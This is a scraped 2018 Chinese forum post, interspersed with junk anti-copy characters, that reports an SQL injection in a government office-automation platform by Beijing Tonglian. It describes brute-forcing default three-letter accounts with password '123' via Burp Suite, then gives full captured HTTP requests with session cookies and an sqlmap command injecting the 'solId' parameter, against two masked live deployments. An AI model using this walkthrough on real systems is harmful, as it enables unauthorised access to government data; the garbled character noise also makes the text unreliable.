|
' P/ s8 W' W! J- \( Q( F
7 E! [6 F% K6 ?0 ?- ` J$ ]
; s+ Z t. j" ?; S0 k% M& g8 J3 c! W8 n) R& U- r* L
平台简介:2 X# C8 _5 s. T- ^6 U5 H" j+ Z
; Q% G' l' C( }
' [7 W% e3 |( Q% L2 Y " t6 F( b5 ]( E4 B' J4 v
. f2 s, f+ q/ b( J) U' x0 w- o/ S" `- U; R! U0 G! i! i
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. i# V- s W g同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ B1 T: j& g' l9 I1 E
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
3 Y0 [- I, n& a
( [7 \8 ]( P, ]0 K
& S P+ @+ _' n ~ w% f0 e' F
+ H, b) |& A( Y( }& ` {
% j9 t% u8 k4 J' g
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( D" f6 Q: M) `9 ]$ t2 y , i7 Y6 J$ f, U5 G9 l; @
' d. l/ X+ Z' \8 w
8 Z$ ?0 N" K+ D$ ] / n& T9 R' v9 J& ~8 k% V) V
1 C( a( ?6 @/ ?% q! @! a" t: @
http://1.1.1.1:7197/cap-aco/#(案例2-)
) ~ g- h5 C, P; H " G) Y( r8 M- [. q/ D4 Q7 t% x3 E
& r1 |3 I6 O) a2 w1 V! w; I- w
http://www.XXOO.com (案例1-官网网站)
3 A3 B' |& _; K4 G5 S; g' O2 h 2 ]7 @: W, w8 ~1 l+ g, K
5 w7 K# }6 ?* y3 p8 \
9 z) N* |2 _/ K, @2 ^% T! @! D, M% V8 R
; b" O/ t! T2 ^
/ C( Z1 B; r. b9 P2 V 漏洞详情:1 Z7 [0 G2 i7 E8 p- C
, a5 D, D: U, N- y% b# P/ C, {, i; G3 @! _2 F+ K' }3 D& n
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试+ W, o0 W4 f. x* ~
5 W# w' S; k: ~5 ~
6 ]6 N F# D9 ]' w4 m( T 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" E9 \; b7 E0 x
; N: Q8 v8 X2 w1 F& P
" h+ u6 h4 [/ ~) w/ I
& g* l0 V- R1 g5 c/ M 8 I; Z% u7 C! {5 o! E/ l( H
: r% w2 M) e) ~. ]4 ^* k
0 b* _' G. k* E8 U/ B 4 N6 V( }; u7 w$ ?! ~
6 ~) k0 a ~ G2 S
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
% A! g7 n9 C3 ~; q: z: j ) P! E0 c( l9 G4 s7 _
% A+ Z4 ^/ v4 G3 z, ?
1、案例1-官方网站
4 `: g: H0 C- O4 u, V7 s& R- M 2 Z1 u+ D6 G" Y) ~# [2 {
0 ?9 z1 ]' s, O7 v& P1 F5 u
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
8 e$ R/ W5 S2 ^: [1 M ( k4 W2 h. p$ K
9 J$ c/ V; E$ i# q; y4 {/ ~$ } f
Host: www.XXOO.com5 I/ P! ]5 I. a
, q5 L* r- s' h7 {' C
' |: R j8 c1 ~4 I7 ^ Proxy-Connection: Keep-Alive! q# ]/ c% J$ K* P
1 p3 r2 F4 }( x. y+ P4 w7 L |4 [+ P% W6 A2 y# m) @$ F
Accept: application/json, text/javascript, */*; q=0.01
; F/ l3 ?: n2 h; I& R, H * L+ `. j- d5 G! H
& N: h$ B' T" b2 C F% `
Accept-Language: zh-CN
% ]5 m% k) W3 L8 r$ u) T' y
& C$ K7 c2 Y0 ?8 K+ G$ R$ c N3 R8 h2 Z9 s# l
Content-Type: application/json/ Z+ W9 u: [: J! Y
+ v' W' }8 |$ q0 W
' \/ J+ u3 S% e4 e; ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko$ I7 Z6 w& X- `9 o( p0 |0 `
6 r; k' ?: j2 g
; J+ F% k7 s/ N! V X-Requested-With: XMLHttpRequest
' \1 X: N4 _9 A ! a$ S5 }$ C) O" I9 i
- B" q: g' G( R& {7 y0 x5 ^( C% n
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
2 `3 c {, ^- R $ _% ?' l% d2 u6 p6 I
" y' ?# m, f* o5 L" C
Accept-Encoding: gzip, deflate, sdch$ Y# R8 x7 a1 j
( ], n3 _. P* _: b& J) K
( I# c2 i* B3 }; ?; V6 f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( b/ Y$ Z8 J0 W6 _' E8 o. q
3 N1 E% \9 S2 c$ N4 n, h& f
" [$ _1 Z' k% J& }/ b* R 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, v' p' M* R: }8 i4 O
% x: `5 |; S0 ~6 v& R
! J; H4 X, X2 e2 _* t# [ 
1 M, n: e2 p$ X% \
. w# l6 D* w$ B2 y/ Q
9 u: ?/ `9 T9 O" Y* R 
* v) ]1 t+ z+ _# x A. b3 i( Q
+ h* w+ Z. W/ b4 I3 Z6 ^, Z. l; O6 R' R$ @
! J, G3 k D- ^( i% x+ z
7 C7 J y- R% P4 x; n
1 c" m3 p$ R3 @! \+ ~3 f% z
* O; v2 q1 F0 c' b' h
) x( F% O# o9 S0 p
" z) @! ]6 C s" n' i9 Z& t 0 N+ u' g! R% N1 {3 j
6 q9 P6 L, n3 z5 P- G5 ^9 _" d
- M" P+ Z" a7 R' ~ 2、案例2-某天河云平台. u3 j8 W5 w/ h6 k+ k
4 \3 [* ?, z0 K4 z
" U: Y0 N. U H+ @% Q4 M GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
5 L' r3 y8 z' S- X7 q# ^- l; p% i % ]9 \1 {" ?9 p8 a
$ I" G6 ?- Q: D- h, a7 J2 ?0 H
Host: 1.1.1.:7197
# U) G0 g) p$ y5 m; \
8 @! Y! ?4 ]( [5 ~7 e+ Q- Y& p* G+ p8 x7 E; x2 T2 G9 U$ f
Accept: application/json, text/javascript, */*; q=0.01
6 J* T: v, C/ M" `! z5 E 2 U, K9 |, p% O2 R
' S, A' }( A' m- W, R! N) T. \ X-Requested-With: XMLHttpRequest
* H6 H7 b7 R; @$ O- i 4 z+ x& \$ U% j8 [) p
( J' |9 ~3 r2 [ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
; h- T# B% Y' d% P + O* _0 `% L1 n0 D+ N. g; \
9 U: _7 f5 ^: h
Content-Type: application/json
, s$ M4 p/ x4 T. J% h; |5 H ! D( c6 U3 e% k3 A ~6 J
) m, z! n9 A% o" P4 o- _
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008( e) ]. O: H0 e3 P5 `
9 _+ D) @- _: F
' D0 i8 t/ s8 K7 T: M4 X8 W3 U
Accept-Language: zh-CN,zh;q=0.88 K/ [, c: n) h0 z
& }; R. X' c! ^ N) M5 w0 O
0 L. V; E. j2 ]/ G4 I Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1- D$ I. ^3 h8 l, i \/ S2 m. K( u
; h# J4 _+ @- V0 {; q) ~# d
$ o4 j& U* x# P& h" u. l1 `1 \ Connection: close% t! K- l9 b5 X; @. c, ?. C
- X# J6 L1 n X5 K6 I' H
# `2 [- X7 ?5 Y
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 }6 S5 t- Y2 v# O- S. z
9 V$ n5 c) Z* o
' X- F3 e- m; s' v3 W; w6 b% {# [, R
+ O3 Y4 L/ @( h | 2 ^2 y5 T( r' V' d! r# i2 |, N/ ~
7 O. c0 m3 @; C. j
. v- v6 ?$ ~4 W6 }* m3 m9 _ | 
发表于 2018-10-20 20:15:17
收藏
支持
反对